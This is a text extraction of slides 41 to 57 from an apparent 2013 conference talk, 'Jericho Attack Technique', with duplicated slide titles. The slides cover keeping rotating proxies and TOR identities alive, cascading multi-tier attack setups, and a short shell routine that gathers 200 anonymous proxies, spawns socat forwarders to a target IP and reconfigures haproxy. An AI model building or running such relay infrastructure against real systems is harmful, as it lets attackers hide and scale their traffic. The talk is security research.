  • 41. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon MaintenanceWeapon Maintenance
  • 42. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon MaintenanceWeapon Maintenance Check if your exit proxies are still working and not blockedCheck if your exit proxies are still working and not blocked Check if your TOR identities aren't blockedCheck if your TOR identities aren't blocked Gather new proxies and reconfigureGather new proxies and reconfigure Renew TOR identities (tor_newid.sh, part of Multi-TOR)Renew TOR identities (tor_newid.sh, part of Multi-TOR) Keeping the blade sharpKeeping the blade sharp
  • 43. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Weapon MaintenanceWeapon Maintenance Watchdog daemons / scriptsWatchdog daemons / scripts Cron jobsCron jobs Manual checkingManual checking Keeping the blade sharpKeeping the blade sharp
  • 44. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Escalating FirepowerEscalating Firepower Multiple Jericho setups on many hostsMultiple Jericho setups on many hosts ++ Intermediary Forwarder/Multiplexer Jericho node(s)Intermediary Forwarder/Multiplexer Jericho node(s) ++ Multiple or single attack sourcesMultiple or single attack sources Large-size clustered attack environmentsLarge-size clustered attack environments
  • 45. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Escalating FirepowerEscalating Firepower Single-tier cascading Jericho architechtureSingle-tier cascading Jericho architechture
  • 46. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Escalating FirepowerEscalating Firepower Multi-tier cascading Jericho architechtureMulti-tier cascading Jericho architechture
  • 47. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Escalating FirepowerEscalating Firepower
  • 48. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon
  • 49. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon Initialization SequenceInitialization Sequence Define Resources multi-tor.sh proxyget.py IP PORT list TOR socket list joinlists.sh jericho.res
  • 50. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon Automatic testingAutomatic testing testresources.shjericho.res all resources valid? proceed gather and revalidate resources
  • 51. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon Self-configurationSelf-configuration initjericho.sh list2socat.sh list2haproxycfg.sh haproxy.cfg jericho.res reload haproxy
  • 52. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon Full routineFull routine Initialize Configure Test Run
  • 53. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon Poor-man's smart JerichoPoor-man's smart Jericho # Gather proxy list ./proxyget.py --minanon high --minspd medium --type http --quantity 200 > /tmp/proxies # Parse list cut -f3,7 -d' ' /tmp/proxies > /tmp/parsedproxy # Spawn socat entries ./gensocat.sh 93.184.216.119 /tmp/parsedproxy # Reconfigure haproxy echo "$HAPROXYCONF_HEAD" > /tmp/haproxy ./genhaproxycfg.sh 200 >> /tmp/haproxy cp /etc/haproxy/haproxy.cfg /etc/haproxy/haproxy.cfg.old cp /tmp/haproxy /etc/haproxy/haproxy.cfg /etc/init.d/haproxy restart
  • 54. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Turning into a smart weaponTurning into a smart weapon What else?What else? Web Interfaces?Web Interfaces? API?API? Cloud-hosted?Cloud-hosted? Quick-deploy packages?Quick-deploy packages? Jericho-as-a-Service (JaaS)?Jericho-as-a-Service (JaaS)?
  • 55. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Demo (:Demo (: Jericho Attack Technique @ YouTubeJericho Attack Technique @ YouTube http://youtu.be/YRMyW2OA0gIhttp://youtu.be/YRMyW2OA0gI
  • 56. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Questions?Questions?
  • 57. Jericho Attack Technique. SEIDL, Jan ValeSecConf/2013 – São Jose dos Campos, Brazil Thank you!Thank you! –– To peace!To peace! jseidl@wroot.org / @jseidl / http://wroot.org